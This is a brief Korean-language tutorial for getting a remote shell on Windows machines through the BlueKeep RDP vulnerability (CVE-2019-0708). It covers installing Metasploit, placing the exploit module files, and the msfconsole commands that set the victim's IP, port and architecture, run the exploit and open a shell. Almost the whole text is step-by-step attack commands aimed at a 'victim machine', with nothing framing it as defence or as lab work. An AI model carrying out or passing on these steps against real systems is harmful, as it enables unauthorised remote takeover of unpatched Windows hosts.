
CVE-2019-0708 RCE 원격 코드 실행 getshell 튜토리얼
kali 설치 업데이트 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
공격 패키지를 다운로드하여 msf의 해당 폴더에 파일을 배치합니다(동일한 이름의 파일이 이미 있으면 덮어씁니다).
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
이용 과정:
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 피해자 머신 IP로 피해자 머신 IP 설정
set RPORT 피해자 머신 포트로 피해자 머신 RDP 포트 번호 설정
set target ID 숫자(선택 가능 0-4)로 피해자 머신 아키텍처 설정
set target=3
exploit
shell
